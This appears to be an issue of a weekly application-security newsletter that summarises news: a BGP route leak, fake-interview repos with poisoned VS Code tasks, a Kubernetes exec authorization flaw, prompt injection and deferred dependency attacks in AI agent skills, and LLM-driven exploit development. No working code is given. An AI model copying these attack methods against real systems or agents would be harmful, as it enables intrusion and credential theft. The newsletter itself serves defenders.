Issue #17 - AppSec Weekly 🛡️

Your go-to source for the latest in application security trends, tools, and insights for third week of January 2026!

Author

Shivasurya
January 26, 2026

AppSec Weekly - Jan 2026

🌶️ 🌶️ This Week in AppSec World 🌶️ 🌶️

A 25-minute BGP misconfiguration in Miami leaked internal IPv6 routes to peers and providers, causing congestion, packet loss, and 12 Gbps of dropped traffic for both Cloudflare customers and external networks. The incident mirrored a 2020 outage and highlights why RPKI validation and ASPA (AS path authorization) are critical for catching route leaks that can redirect or blackhole traffic across the Internet

Chromium bans std::bind, std::function, std::shared_ptr, exceptions, std::regex, and the standard thread library in favor of base:: equivalents that prevent lifetime bugs. The guide also blocks std::filesystem, std::any, and certain template patterns because they cause security issues or have poor compiler support.

North Korean hackers are using fake job interviews to trick developers into cloning repos that contain poisoned tasks.json files—when you open the project in VS Code and click "trust," it quietly downloads a JavaScript backdoor. The attack sidesteps traditional malware defenses by riding on legitimate developer workflows, and because the payloads get hosted on places like Vercel, most security tools don't flag them until credentials and source code are already gone.

The nodes/proxy GET permission—used by 69 Helm charts including Prometheus, Datadog, and Grafana—lets you execute code in any Pod because the Kubelet authorizes based on the WebSocket handshake's HTTP GET instead of checking if you have CREATE permissions for the actual exec operation. Kubernetes closed this as "won't fix" and pointed to KEP-2862 as the solution, but that KEP doesn't even cover /exec endpoints and the underlying authorization bug remains unfixed.

The post recommends using JSON schema validation in values.yaml to catch misconfigurations before they hit production, plus defensive defaults that prioritize security over convenience (no hardcoded passwords, no permissive RBAC). Helm charts without schema checks let you accidentally deploy databases with authentication disabled or services exposed to the internet, which is how most Kubernetes security incidents actually happen.

🤖 This Week in AI Security 🤖

Agent Skills let AI agents load third-party capabilities, but a study of 42,000 skills found 26% had vulnerabilities ranging from prompt injection to supply chain attacks. The nastiest issue is deferred attacks—a skill ships with unpinned Python dependencies that look clean during review, then the attacker publishes malicious versions later that execute when the agent runs the script

cURL's maintainer killed the HackerOne bug bounty after seven years because AI-generated junk reports were eating the security team alive—20 submissions in the first three weeks of 2026, none of them actual vulnerabilities. The program paid out $100k and found 87 real bugs, but Stenberg decided removing the financial incentive was the only way to stop people from submitting crap they didn't understand or reproduce.

Opus 4.5 and GPT-5.2 can now turn zero-days into working exploits through trial and error, treating token budgets like assembly lines where you throw compute at vulnerabilities until something breaks through. Exploit development used to require rare expertise, but when LLMs can search solution spaces autonomously and verify success automatically (did the payload call back?), the bottleneck becomes money instead of skill

Using Proxies to Hide Secrets from Claude Code

Claude Code reads .env files without asking, so the Formal team recommends running a proxy that injects real API keys into outbound requests while keeping only dummy placeholders inside the sandbox where the agent can see them. The proxy approach stops accidental leaks through prompt logs or model context, but you still need to trust the proxy itself and whitelist which domains the agent can hit.

🏆 AppSec Tools of The Week 🏆

Go-based TUI tool that discovers LAN devices using mDNS, SSDP, and ARP cache reading without elevated privileges. Helps identify shadow IT and unmanaged devices (IoT, forgotten servers) for asset inventory and attack surface mapping, plus includes an optional port scanner for service discovery.

Dangerzone renders untrusted PDFs and Office docs into raw pixels inside an isolated Docker container, then rebuilds a clean PDF from those pixels outside the sandbox—think of it as printing and rescanning a document to strip out embedded exploits. Freedom of the Press Foundation maintains it for journalists handling leaks, but it's useful for anyone who opens sketchy attachments, since it kills JavaScript, links, and metadata in the process.

And that’s a wrap for this week! If you enjoy this curated issue, feel free to forward or share it with your appsec folks, team, hackerclub. For feedback, hugs, bugs or chats drop an email to [email protected]